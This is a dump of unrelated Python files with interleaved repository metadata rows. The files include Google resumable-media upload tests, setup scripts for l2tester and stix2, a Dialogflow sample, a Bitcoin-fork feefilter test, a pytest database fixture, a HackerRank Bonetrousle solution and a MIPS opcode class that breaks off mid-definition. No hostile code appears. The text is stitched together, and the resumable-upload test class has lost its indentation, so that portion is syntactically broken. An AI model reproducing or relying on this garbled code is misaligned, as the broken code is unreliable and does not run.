ONE_MB = 1024 * 1024  # chunk size handed to ResumableUpload in these tests
BASIC_CONTENT = "text/plain"
JSON_TYPE = "application/json; charset=UTF-8"
JSON_TYPE_LINE = b"content-type: application/json; charset=UTF-8\r\n"
# (connect, read) timeout the tests expect by default — NOTE(review):
# presumably the library's default transport timeout; confirm against
# google.resumable_media.requests.
EXPECTED_TIMEOUT = (61, 60)
class TestSimpleUpload(object):
    """Tests for ``upload_mod.SimpleUpload.transmit``."""

    @staticmethod
    def _make_upload_and_transport():
        # Fresh upload object plus a transport stub that records the request.
        upload = upload_mod.SimpleUpload(SIMPLE_URL)
        transport = mock.Mock(spec=["request"])
        transport.request.return_value = _make_response()
        return upload, transport

    def test_transmit(self):
        payload = b"I have got a lovely bunch of coconuts."
        upload, transport = self._make_upload_and_transport()

        assert not upload.finished
        response = upload.transmit(transport, payload, BASIC_CONTENT)
        assert response is transport.request.return_value
        assert upload.finished

        # Exactly one POST carrying the raw media bytes, with the default
        # (connect, read) timeout.
        transport.request.assert_called_once_with(
            "POST",
            SIMPLE_URL,
            data=payload,
            headers={"content-type": BASIC_CONTENT},
            timeout=EXPECTED_TIMEOUT,
        )

    def test_transmit_w_custom_timeout(self):
        payload = b"I have got a lovely bunch of coconuts."
        upload, transport = self._make_upload_and_transport()

        upload.transmit(transport, payload, BASIC_CONTENT, timeout=12.6)

        # A caller-supplied timeout must be forwarded to the transport verbatim.
        transport.request.assert_called_once_with(
            "POST",
            SIMPLE_URL,
            data=payload,
            headers={"content-type": BASIC_CONTENT},
            timeout=12.6,
        )
class TestMultipartUpload(object):
    """Tests for ``upload_mod.MultipartUpload.transmit``.

    The boundary generator is patched so the multipart payload is
    byte-for-byte predictable.
    """

    @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==4==")
    def test_transmit(self, mock_get_boundary):
        data = b"Mock data here and there."
        metadata = {"Hey": "You", "Guys": "90909"}
        content_type = BASIC_CONTENT
        upload = upload_mod.MultipartUpload(MULTIPART_URL)
        transport = mock.Mock(spec=["request"])
        transport.request.return_value = _make_response()
        assert not upload.finished
        ret_val = upload.transmit(transport, data, metadata, content_type)
        assert ret_val is transport.request.return_value
        # Expected body: JSON metadata part followed by the media part,
        # delimited by the patched "==4==" boundary.
        expected_payload = (
            b"--==4==\r\n"
            + JSON_TYPE_LINE
            + b"\r\n"
            + json.dumps(metadata).encode("utf-8")
            + b"\r\n"
            + b"--==4==\r\n"
            b"content-type: text/plain\r\n"
            b"\r\n"
            b"Mock data here and there.\r\n"
            b"--==4==--"
        )
        multipart_type = b'multipart/related; boundary="==4=="'
        upload_headers = {"content-type": multipart_type}
        transport.request.assert_called_once_with(
            "POST",
            MULTIPART_URL,
            data=expected_payload,
            headers=upload_headers,
            timeout=EXPECTED_TIMEOUT,
        )
        assert upload.finished
        mock_get_boundary.assert_called_once_with()

    @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==4==")
    def test_transmit_w_custom_timeout(self, mock_get_boundary):
        data = b"Mock data here and there."
        metadata = {"Hey": "You", "Guys": "90909"}
        content_type = BASIC_CONTENT
        upload = upload_mod.MultipartUpload(MULTIPART_URL)
        transport = mock.Mock(spec=["request"])
        transport.request.return_value = _make_response()
        upload.transmit(transport, data, metadata, content_type, timeout=12.6)
        expected_payload = b"".join(
            (
                b"--==4==\r\n",
                JSON_TYPE_LINE,
                b"\r\n",
                json.dumps(metadata).encode("utf-8"),
                b"\r\n",
                b"--==4==\r\n",
                b"content-type: text/plain\r\n",
                b"\r\n",
                b"Mock data here and there.\r\n",
                b"--==4==--",
            )
        )
        multipart_type = b'multipart/related; boundary="==4=="'
        upload_headers = {"content-type": multipart_type}
        # The caller-supplied timeout must be forwarded to the transport.
        transport.request.assert_called_once_with(
            "POST",
            MULTIPART_URL,
            data=expected_payload,
            headers=upload_headers,
            timeout=12.6,
        )
        assert upload.finished
        mock_get_boundary.assert_called_once_with()
class TestResumableUpload(object):
def test_initiate(self):
upload = upload_mod.ResumableUpload(RESUMABLE_URL, ONE_MB)
data = b"Knock knock who is there"
stream = io.BytesIO(data)
metadata = {"name": "got-jokes.txt"}
transport = mock.Mock(spec=["request"])
location = ("http://test.invalid?upload_id=AACODBBBxuw9u3AA",)
response_headers = {"location": location}
post_response = _make_response(headers=response_headers)
transport.request.return_value = post_response
# Check resumable_url before.
assert upload._resumable_url is None
# Make request and check the return value (against the mock).
total_bytes = 100
assert total_bytes > len(data)
response = upload.initiate(
transport,
stream,
metadata,
BASIC_CONTENT,
total_bytes=total_bytes,
stream_final=False,
)
assert response is transport.request.return_value
# Check resumable_url after.
assert upload._resumable_url == location
# Make sure the mock was called as expected.
json_bytes = b'{"name": "got-jokes.txt"}'
expected_headers = {
"content-type": JSON_TYPE,
"x-upload-content-type": BASIC_CONTENT,
"x-upload-content-length": "{:d}".format(total_bytes),
}
transport.request.assert_called_once_with(
"POST",
RESUMABLE_URL,
data=json_bytes,
headers=expected_headers,
timeout=EXPECTED_TIMEOUT,
)
def test_initiate_w_custom_timeout(self):
upload = upload_mod.ResumableUpload(RESUMABLE_URL, ONE_MB)
data = b"Knock knock who is there"
stream = io.BytesIO(data)
metadata = {"name": "got-jokes.txt"}
transport = mock.Mock(spec=["request"])
location = ("http://test.invalid?upload_id=AACODBBBxuw9u3AA",)
response_headers = {"location": location}
post_response = _make_response(headers=response_headers)
transport.request.return_value = post_response
upload.initiate(
transport,
stream,
metadata,
BASIC_CONTENT,
total_bytes=100,
timeout=12.6,
)
# Make sure timeout was passed to the transport
json_bytes = b'{"name": "got-jokes.txt"}'
expected_headers = {
"content-type": JSON_TYPE,
"x-upload-content-type": BASIC_CONTENT,
"x-upload-content-length": "{:d}".format(100),
}
transport.request.assert_called_once_with(
"POST",
RESUMABLE_URL,
data=json_bytes,
headers=expected_headers,
timeout=12.6,
)
@staticmethod
def _upload_in_flight(data, headers=None):
    """Build a ResumableUpload that looks like an initiated, in-progress upload."""
    upload = upload_mod.ResumableUpload(RESUMABLE_URL, ONE_MB, headers=headers)
    # Populate the private state that ``initiate`` would normally have set.
    upload._content_type = BASIC_CONTENT
    upload._total_bytes = len(data)
    upload._stream = io.BytesIO(data)
    upload._resumable_url = "http://test.invalid?upload_id=not-none"
    return upload
@staticmethod
def _chunk_mock(status_code, response_headers):
    """Return a mock transport whose ``request`` yields a canned chunk response."""
    response = _make_response(status_code=status_code, headers=response_headers)
    transport = mock.Mock(spec=["request"])
    transport.request.return_value = response
    return transport
def test_transmit_next_chunk(self):
    """Upload one chunk and verify the PUT request and byte bookkeeping.

    A 308 (PERMANENT_REDIRECT) response carrying a ``range`` header is how
    the resumable-upload protocol acknowledges a partial chunk.
    """
    data = b"This time the data is official."
    upload = self._upload_in_flight(data)
    # Make a fake chunk size smaller than 256 KB.
    chunk_size = 10
    assert chunk_size < len(data)
    upload._chunk_size = chunk_size
    # Make a fake 308 response.
    response_headers = {"range": "bytes=0-{:d}".format(chunk_size - 1)}
    transport = self._chunk_mock(
        resumable_media.PERMANENT_REDIRECT, response_headers
    )
    # Check the state before the request.
    assert upload._bytes_uploaded == 0
    # Make request and check the return value (against the mock).
    response = upload.transmit_next_chunk(transport)
    assert response is transport.request.return_value
    # Check that the state has been updated.
    assert upload._bytes_uploaded == chunk_size
    # Make sure the mock was called as expected: a PUT with the first
    # ``chunk_size`` bytes and a matching content-range header.
    payload = data[:chunk_size]
    content_range = "bytes 0-{:d}/{:d}".format(chunk_size - 1, len(data))
    expected_headers = {
        "content-range": content_range,
        "content-type": BASIC_CONTENT,
    }
    transport.request.assert_called_once_with(
        "PUT",
        upload.resumable_url,
        data=payload,
        headers=expected_headers,
        timeout=EXPECTED_TIMEOUT,
    )
def test_transmit_next_chunk_w_custom_timeout(self):
    """transmit_next_chunk must forward a caller-supplied timeout to the transport."""
    data = b"This time the data is official."
    upload = self._upload_in_flight(data)
    # A chunk size smaller than the payload forces a partial (308) PUT.
    chunk_size = 10
    upload._chunk_size = chunk_size
    last_byte = chunk_size - 1
    transport = self._chunk_mock(
        resumable_media.PERMANENT_REDIRECT,
        {"range": "bytes=0-{:d}".format(last_byte)},
    )
    upload.transmit_next_chunk(transport, timeout=12.6)
    # The PUT must carry the first chunk, its content-range, and the timeout.
    transport.request.assert_called_once_with(
        "PUT",
        upload.resumable_url,
        data=data[:chunk_size],
        headers={
            "content-range": "bytes 0-{:d}/{:d}".format(last_byte, len(data)),
            "content-type": BASIC_CONTENT,
        },
        timeout=12.6,
    )
def test_recover(self):
    """Recovering an invalid upload must re-sync state from the server's range.

    ``recover`` issues a ``bytes */*`` PUT; the 308 response's ``range``
    header tells the client how many bytes the server already holds.
    """
    upload = upload_mod.ResumableUpload(RESUMABLE_URL, ONE_MB)
    upload._invalid = True  # Make sure invalid.
    upload._stream = mock.Mock(spec=["seek"])
    upload._resumable_url = "http://test.invalid?upload_id=big-deal"
    end = 55555
    headers = {"range": "bytes=0-{:d}".format(end)}
    transport = self._chunk_mock(resumable_media.PERMANENT_REDIRECT, headers)
    ret_val = upload.recover(transport)
    assert ret_val is transport.request.return_value
    # Check the state of ``upload`` after.
    assert upload.bytes_uploaded == end + 1
    assert not upload.invalid
    # The stream must be repositioned to the first byte the server lacks.
    upload._stream.seek.assert_called_once_with(end + 1)
    expected_headers = {"content-range": "bytes */*"}
    transport.request.assert_called_once_with(
        "PUT",
        upload.resumable_url,
        data=None,
        headers=expected_headers,
        timeout=EXPECTED_TIMEOUT,
    )
def _make_response(status_code=http.client.OK, headers=None):
headers = headers or {}
return mock.Mock(
headers=headers, status_code=status_code, spec=["headers", "status_code"]
)
| 36.268786 | 88 | 0.61981 |
c885b530bddab76e560318fe6b252dcb82221293 | 547 | py | Python | release/python/setup.py | pbianchi/l2tester | 94e541fc08387555d2b81bd8dc447446c265afbb | [
"MIT"
] | 8 | 2018-04-05T12:05:42.000Z | 2021-07-01T10:44:29.000Z | release/python/setup.py | pbianchi/l2tester | 94e541fc08387555d2b81bd8dc447446c265afbb | [
"MIT"
] | 6 | 2018-04-05T10:36:31.000Z | 2021-08-08T08:06:13.000Z | release/python/setup.py | pbianchi/l2tester | 94e541fc08387555d2b81bd8dc447446c265afbb | [
"MIT"
] | 9 | 2018-04-04T19:15:49.000Z | 2021-08-07T10:17:10.000Z | #!/usr/bin/env python
from distutils.core import setup
# Package metadata for l2tester; installs the ``shark`` and ``sharknado``
# command-line scripts alongside the library.
setup(name='l2tester',
      version='1.0',
      author='Datacom',
      url='https://github.com/datacom-teracom/l2tester',
      description='l2tester is a set of tools projected to network traffic tests using the PC interfaces.',
      scripts=['bin/shark', 'bin/sharknado'],
      packages=['l2tester'],
      include_package_data=True,
      platforms='linux',
      install_requires=['scapy', 'pyroute2<0.6.0', 'ipaddress'],
      # Ship the prebuilt native extension (_l2tester.so) inside the package.
      package_data={'l2tester': ['_l2tester.so']},
      )
| 32.176471 | 107 | 0.650823 |
19e3deb62f92a6a6654d5f839c9e29648e127c60 | 1,060 | py | Python | python/dicebeard/skb_roll/beardeddie.py | DavidAmison/dicebeard | f864a54044dbe81ea5865c264b58a63888c08ac2 | [
"Unlicense"
] | null | null | null | python/dicebeard/skb_roll/beardeddie.py | DavidAmison/dicebeard | f864a54044dbe81ea5865c264b58a63888c08ac2 | [
"Unlicense"
] | 4 | 2017-03-03T14:57:01.000Z | 2017-06-19T14:06:43.000Z | python/dicebeard/skb_roll/beardeddie.py | DavidAmison/dicebeard | f864a54044dbe81ea5865c264b58a63888c08ac2 | [
"Unlicense"
] | 3 | 2017-02-04T18:37:06.000Z | 2019-06-20T09:24:02.000Z | import os
from pathlib import Path
from PIL import Image
import pyconfig
import pydice
class ImageNotSupported(Exception):
pass
class BeardedDie:
def __init__(self, die):
self.die = die
# Time to strap our to_image to pydice's Die
if pyconfig.get('dicebeard.images_path'):
pydice.dice.Die.images_path = Path(
pyconfig.get('dicebeard.images_path'))
else:
pydice.dice.Die.images_path = Path(
os.path.dirname(__file__)) / 'images'
def __getattr__(self, attr):
return getattr(self.die, attr)
def to_image(self):
'''Emits a PIL.Image of the die is possible'''
die_image_path = (self.images_path /
'd{}'.format(self.faces.stop-1) /
'{}.png'.format(self.result))
try:
return Image.open(str(die_image_path))
except FileNotFoundError:
raise ImageNotSupported(
'{} is not currently supported.'.format(self.name))
| 27.179487 | 71 | 0.580189 |
b96984e406bc6b26636241986fca1efb9d38135f | 1,581 | py | Python | samples/generated_samples/dialogflow_generated_dialogflow_v2_answer_records_list_answer_records_sync.py | rkdfc93/python-dialogflow | a59cff0298ef18674c0b4133ef0a6ab82e288920 | [
"Apache-2.0"
] | 171 | 2018-09-19T21:16:18.000Z | 2020-12-07T17:41:10.000Z | samples/generated_samples/dialogflow_generated_dialogflow_v2_answer_records_list_answer_records_sync.py | rkdfc93/python-dialogflow | a59cff0298ef18674c0b4133ef0a6ab82e288920 | [
"Apache-2.0"
] | 150 | 2018-09-25T14:04:28.000Z | 2020-12-09T21:45:43.000Z | samples/generated_samples/dialogflow_generated_dialogflow_v2_answer_records_list_answer_records_sync.py | rkdfc93/python-dialogflow | a59cff0298ef18674c0b4133ef0a6ab82e288920 | [
"Apache-2.0"
] | 75 | 2018-09-22T14:12:18.000Z | 2020-12-08T07:12:12.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ListAnswerRecords
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_generated_dialogflow_v2_AnswerRecords_ListAnswerRecords_sync]
from google.cloud import dialogflow_v2
def sample_list_answer_records():
    """List answer records from Dialogflow and print each one."""
    # Create a client
    client = dialogflow_v2.AnswerRecordsClient()

    # Initialize request argument(s)
    request = dialogflow_v2.ListAnswerRecordsRequest(
        parent="parent_value",
        filter="filter_value",
    )

    # Make the request and print each record as the pager streams it in.
    for response in client.list_answer_records(request=request):
        print(response)
# [END dialogflow_generated_dialogflow_v2_AnswerRecords_ListAnswerRecords_sync]
| 32.9375 | 85 | 0.762808 |
14179422041539eb35d5679af5880f0cbb9689ea | 5,187 | py | Python | test/functional/p2p_feefilter.py | danecoin/Danecoin | 73d21d335c11a8966c995b7e8c520c2b55695c04 | [
"MIT"
] | 3 | 2021-05-14T20:46:07.000Z | 2022-03-07T13:06:28.000Z | test/functional/p2p_feefilter.py | danecoin/Danecoin | 73d21d335c11a8966c995b7e8c520c2b55695c04 | [
"MIT"
] | null | null | null | test/functional/p2p_feefilter.py | danecoin/Danecoin | 73d21d335c11a8966c995b7e8c520c2b55695c04 | [
"MIT"
] | 1 | 2021-11-18T23:16:38.000Z | 2021-11-18T23:16:38.000Z | #!/usr/bin/env python3
# Copyright (c) 2016-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of feefilter messages."""
from decimal import Decimal
from test_framework.messages import MSG_TX, MSG_WTX, msg_feefilter
from test_framework.p2p import P2PInterface, p2p_lock
from test_framework.test_framework import DanecoinTestFramework
from test_framework.util import assert_equal
from test_framework.wallet import MiniWallet
class FeefilterConn(P2PInterface):
    """Test peer that records whether the node ever sent it a feefilter."""

    feefilter_received = False

    def on_feefilter(self, message):
        # Handler invoked by the P2P framework when a feefilter arrives.
        self.feefilter_received = True

    def assert_feefilter_received(self, recv: bool):
        # Read under the P2P lock: handlers run on the network thread.
        with p2p_lock:
            assert_equal(self.feefilter_received, recv)
class TestP2PConn(P2PInterface):
    """Peer that collects the id of every transaction inv it receives."""

    def __init__(self):
        super().__init__()
        self.txinvs = []

    def on_inv(self, message):
        # Record transaction announcements only (txid or wtxid), as
        # 64-character zero-padded hex strings.
        for item in message.inv:
            if item.type in (MSG_TX, MSG_WTX):
                self.txinvs.append('{:064x}'.format(item.hash))

    def wait_for_invs_to_match(self, invs_expected):
        invs_expected.sort()
        self.wait_until(lambda: sorted(self.txinvs) == invs_expected)

    def clear_invs(self):
        with p2p_lock:
            self.txinvs = []
class FeeFilterTest(DanecoinTestFramework):
    """Functional test: feefilter messages suppress relay of low-fee txs."""

    def set_test_params(self):
        self.num_nodes = 2
        # We lower the various required feerates for this test
        # to catch a corner-case where feefilter used to slightly undercut
        # mempool and wallet feerate calculation based on GetFee
        # rounding down 3 places, leading to stranded transactions.
        # See issue #16499
        # grant noban permission to all peers to speed up tx relay / mempool sync
        self.extra_args = [[
            "-minrelaytxfee=0.00000100",
            "-mintxfee=0.00000100",
            "-whitelist=noban@127.0.0.1",
        ]] * self.num_nodes

    def run_test(self):
        self.test_feefilter_forcerelay()
        self.test_feefilter()

    def test_feefilter_forcerelay(self):
        # Peers with forcerelay permission bypass fee filtering, so the node
        # should not send them a feefilter message at all.
        self.log.info('Check that peers without forcerelay permission (default) get a feefilter message')
        self.nodes[0].add_p2p_connection(FeefilterConn()).assert_feefilter_received(True)

        self.log.info('Check that peers with forcerelay permission do not get a feefilter message')
        self.restart_node(0, extra_args=['-whitelist=forcerelay@127.0.0.1'])
        self.nodes[0].add_p2p_connection(FeefilterConn()).assert_feefilter_received(False)

        # Restart to disconnect peers and load default extra_args
        self.restart_node(0)
        self.connect_nodes(1, 0)

    def test_feefilter(self):
        """Transactions below an announced feefilter must not be relayed."""
        node1 = self.nodes[1]
        node0 = self.nodes[0]
        miniwallet = MiniWallet(node1)
        # Add enough mature utxos to the wallet, so that all txs spend confirmed coins
        miniwallet.generate(5)
        node1.generate(100)

        conn = self.nodes[0].add_p2p_connection(TestP2PConn())

        self.log.info("Test txs paying 0.2 sat/byte are received by test connection")
        txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00000200'), from_node=node1)['wtxid'] for _ in range(3)]
        conn.wait_for_invs_to_match(txids)
        conn.clear_invs()

        # Set a fee filter of 0.15 sat/byte on test connection
        conn.send_and_ping(msg_feefilter(150))

        self.log.info("Test txs paying 0.15 sat/byte are received by test connection")
        txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00000150'), from_node=node1)['wtxid'] for _ in range(3)]
        conn.wait_for_invs_to_match(txids)
        conn.clear_invs()

        self.log.info("Test txs paying 0.1 sat/byte are no longer received by test connection")
        txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00000100'), from_node=node1)['wtxid'] for _ in range(3)]
        self.sync_mempools()  # must be sure node 0 has received all txs

        # Send one transaction from node0 that should be received, so that we
        # we can sync the test on receipt (if node1's txs were relayed, they'd
        # be received by the time this node0 tx is received). This is
        # unfortunately reliant on the current relay behavior where we batch up
        # to 35 entries in an inv, which means that when this next transaction
        # is eligible for relay, the prior transactions from node1 are eligible
        # as well.
        txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00020000'), from_node=node0)['wtxid'] for _ in range(1)]
        conn.wait_for_invs_to_match(txids)
        conn.clear_invs()
        self.sync_mempools()  # must be sure node 1 has received all txs

        self.log.info("Remove fee filter and check txs are received again")
        conn.send_and_ping(msg_feefilter(0))
        txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00020000'), from_node=node1)['wtxid'] for _ in range(3)]
        conn.wait_for_invs_to_match(txids)
        conn.clear_invs()
if __name__ == '__main__':
    # Entry point: run the functional test via the framework's CLI harness.
    FeeFilterTest().main()
| 41.496 | 123 | 0.687295 |
71167b3e74b07cf3aef35dfacf0d4e4cfb581a57 | 1,464 | py | Python | tests/conftest.py | lizardschool/wordbook | 843df3941c15ae88870874bdbf18cbf677b67e7f | [
"MIT"
] | null | null | null | tests/conftest.py | lizardschool/wordbook | 843df3941c15ae88870874bdbf18cbf677b67e7f | [
"MIT"
] | null | null | null | tests/conftest.py | lizardschool/wordbook | 843df3941c15ae88870874bdbf18cbf677b67e7f | [
"MIT"
] | null | null | null | """Tests configuration module."""
import sys
import os
import pytest
from alembic.command import upgrade, downgrade
from alembic.config import Config
# TODO: It shouldn't be there.
sys.path.insert(0, os.path.abspath('.'))  # make the project root importable

# Throwaway SQLite database file, created/destroyed around each test by the
# ``db`` fixture below.
TESTDB = 'test_wordbook.db'
TESTDB_PATH = "{}".format(TESTDB)
@pytest.fixture()
def app():
    """Return a freshly-created Flask application for the test."""
    from wordbook import flaskapp
    return flaskapp.create_app({})
@pytest.fixture(autouse=True)
def db(request, monkeypatch):
    """Session-wide test database.

    Creates a throwaway SQLite database, points the app's engine/session
    factory at it, migrates to Alembic ``head``, and on teardown downgrades
    and deletes the file.
    """
    # Start from a clean slate if a previous run left the file behind.
    if os.path.exists(TESTDB_PATH):
        os.unlink(TESTDB_PATH)

    from wordbook.infra import config
    from wordbook.infra import db
    monkeypatch.setattr(config, 'SQLALCHEMY_ENGINE', 'sqlite:///' + TESTDB_PATH)

    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker
    _engine = create_engine(
        'sqlite:///' + TESTDB_PATH,
        echo=config.SQLALCHEMY_ECHO,
        echo_pool=config.SQLALCHEMY_ECHO_POOL)
    db_session = sessionmaker(bind=_engine)

    def get_session():
        # Hand out a fresh session bound to the test engine on each call.
        return db_session()

    monkeypatch.setattr(db, 'get_session', get_session)

    alembic_config = Config('alembic.ini')
    alembic_config.set_section_option('alembic', 'sqlalchemy.url', 'sqlite:///' + TESTDB_PATH)

    def teardown():
        # NOTE(review): '18554c40c9e' is presumably the earliest migration
        # revision — confirm against the Alembic history.
        downgrade(alembic_config, '18554c40c9e')
        os.unlink(TESTDB_PATH)

    upgrade(alembic_config, 'head')
    request.addfinalizer(teardown)
    return
| 25.241379 | 94 | 0.698087 |
1ce633ae70c7fc0f66934bb0ddd1d6ca8eb9d6b0 | 897 | py | Python | src/mathematics/combination/hkr_bonetrousle.py | joeyworld/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | 1 | 2019-02-11T09:18:14.000Z | 2019-02-11T09:18:14.000Z | src/mathematics/combination/hkr_bonetrousle.py | gyukebox/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | null | null | null | src/mathematics/combination/hkr_bonetrousle.py | gyukebox/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | null | null | null | import os
import sys
def bonetrousle(n, k, b):
    """Pick ``b`` distinct stick counts from 1..k summing to ``n``.

    (HackerRank "Bonetrousle".)

    Args:
        n (int): required total number of sticks.
        k (int): largest box size; boxes hold 1..k sticks each.
        b (int): number of boxes to buy.

    Returns:
        list: ``b`` distinct integers in [1, k] whose sum is ``n``,
        or ``[-1]`` when no such selection exists.
    """
    # The b smallest distinct picks are 1..b and the b largest are
    # k-b+1..k; use closed-form arithmetic-series sums instead of
    # materialising throwaway lists (the original summed a list built
    # just for this purpose).
    min_sum = b * (b + 1) // 2
    max_sum = b * (2 * k - b + 1) // 2
    if not min_sum <= n <= max_sum:
        return [-1]

    result = [i + 1 for i in range(b)]
    diff = n - min_sum
    # Greedily raise the largest entries first: each entry can grow by at
    # most k - b while keeping all values distinct and <= k. diff is
    # guaranteed to be exhausted because diff <= max_sum - min_sum = b*(k-b).
    for current in range(b - 1, -1, -1):
        if diff == 0:
            break
        bump = min(diff, k - b)
        result[current] += bump
        diff -= bump
    return result
if __name__ == '__main__':
    # Input: first line is the number of cases; each case is "n k b".
    # Output: one line per case of space-separated box sizes (or -1).
    for _ in range(int(input())):
        parts = input().split()
        n, k, b = int(parts[0]), int(parts[1]), int(parts[2])
        print(' '.join(str(value) for value in bonetrousle(n, k, b)))
| 21.878049 | 46 | 0.478261 |
2fc5d707208a7996e4fad44e7e72cfcf5f361442 | 2,178 | py | Python | setup.py | 6un9-h0-Dan/cti-python-stix2 | 5a34d529a8f29e8a1bce510ebc99aa7e3d74e2ef | [
"BSD-3-Clause"
] | null | null | null | setup.py | 6un9-h0-Dan/cti-python-stix2 | 5a34d529a8f29e8a1bce510ebc99aa7e3d74e2ef | [
"BSD-3-Clause"
] | null | null | null | setup.py | 6un9-h0-Dan/cti-python-stix2 | 5a34d529a8f29e8a1bce510ebc99aa7e3d74e2ef | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from codecs import open
import os.path
from setuptools import find_packages, setup
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
VERSION_FILE = os.path.join(BASE_DIR, 'stix2', 'version.py')
def get_version():
    """Return the package version parsed from ``stix2/version.py``.

    Scans for the ``__version__ = "..."`` assignment and returns its
    unquoted value.

    Raises:
        AttributeError: if no ``__version__`` line exists in the file.
    """
    with open(VERSION_FILE) as f:
        # Iterate the file lazily instead of materialising every line
        # with readlines().
        for line in f:
            if line.startswith('__version__'):
                return line.split()[-1].strip('"')
    raise AttributeError("Package does not have a __version__")
def get_long_description():
    """Return the README contents used as the PyPI long description.

    NOTE(review): ``open`` here is ``codecs.open`` (imported at the top of
    this file) with no explicit encoding — presumably the README is
    ASCII/UTF-8; confirm.
    """
    with open('README.rst') as f:
        return f.read()
# Package metadata for python-stix2 (PyPI name: stix2).
setup(
    name='stix2',
    version=get_version(),
    description='Produce and consume STIX 2 JSON content',
    long_description=get_long_description(),
    long_description_content_type='text/x-rst',
    url='https://oasis-open.github.io/cti-documentation/',
    author='OASIS Cyber Threat Intelligence Technical Committee',
    author_email='cti-users@lists.oasis-open.org',
    maintainer='Chris Lenk, Emmanuelle Vargas-Gonzalez',
    maintainer_email='clenk@mitre.org, emmanuelle@mitre.org',
    license='BSD',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Topic :: Security',
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
    ],
    keywords='stix stix2 json cti cyber threat intelligence',
    # Test packages are excluded from distributions.
    packages=find_packages(exclude=['*.test', '*.test.*']),
    install_requires=[
        'pytz',
        'requests',
        'simplejson',
        'six>=1.13.0',
        'stix2-patterns>=1.2.0',
    ],
    project_urls={
        'Documentation': 'https://stix2.readthedocs.io/',
        'Source Code': 'https://github.com/oasis-open/cti-python-stix2/',
        'Bug Tracker': 'https://github.com/oasis-open/cti-python-stix2/issues/',
    },
    # Optional feature sets, installable as stix2[taxii] / stix2[semantic].
    extras_require={
        'taxii': ['taxii2-client>=2.2.1'],
        'semantic': ['haversine', 'rapidfuzz'],
    },
)
| 32.507463 | 80 | 0.623049 |
2e4397f955366349c9bc4d8a2d7aa50a6202d117 | 3,175 | py | Python | chb/mips/opcodes/MIPSInsertBitField.py | orinatic/CodeHawk-Binary | 8b4fd728213e629736d5ece840ea3b43cea53f30 | [
"MIT"
] | null | null | null | chb/mips/opcodes/MIPSInsertBitField.py | orinatic/CodeHawk-Binary | 8b4fd728213e629736d5ece840ea3b43cea53f30 | [
"MIT"
] | null | null | null | chb/mips/opcodes/MIPSInsertBitField.py | orinatic/CodeHawk-Binary | 8b4fd728213e629736d5ece840ea3b43cea53f30 | [
"MIT"
] | null | null | null | # ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2016-2020 Kestrel Technology LLC
# Copyright (c) 2020-2021 Henny Sipma
# Copyright (c) 2021 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import cast, List, Sequence, TYPE_CHECKING
from chb.app.InstrXData import InstrXData
from chb.mips.MIPSDictionaryRecord import mipsregistry
from chb.mips.MIPSOpcode import MIPSOpcode, simplify_result
from chb.mips.MIPSOperand import MIPSOperand
import chb.simulation.SimUtil as SU
import chb.simulation.SimValue as SV
import chb.util.fileutil as UF
from chb.util.IndexedTable import IndexedTableValue
if TYPE_CHECKING:
from chb.mips.MIPSDictionary import MIPSDictionary
from chb.mips.simulation.MIPSimulationState import MIPSimulationState
@mipsregistry.register_tag("ins", MIPSOpcode)
class MIPSInsertBitField(MIPSOpcode):
    """INS rt, rs, pos, size

    Merge a right-justified bit field from rs into a specified field in rt.

    args[0]: index of rt in mips dictionary
    args[1]: index of rs in mips dictionary
    args[2]: position (pos)
    args[3]: size
    """

    def __init__(
            self,
            mipsd: "MIPSDictionary",
            ixval: IndexedTableValue) -> None:
        MIPSOpcode.__init__(self, mipsd, ixval)

    @property
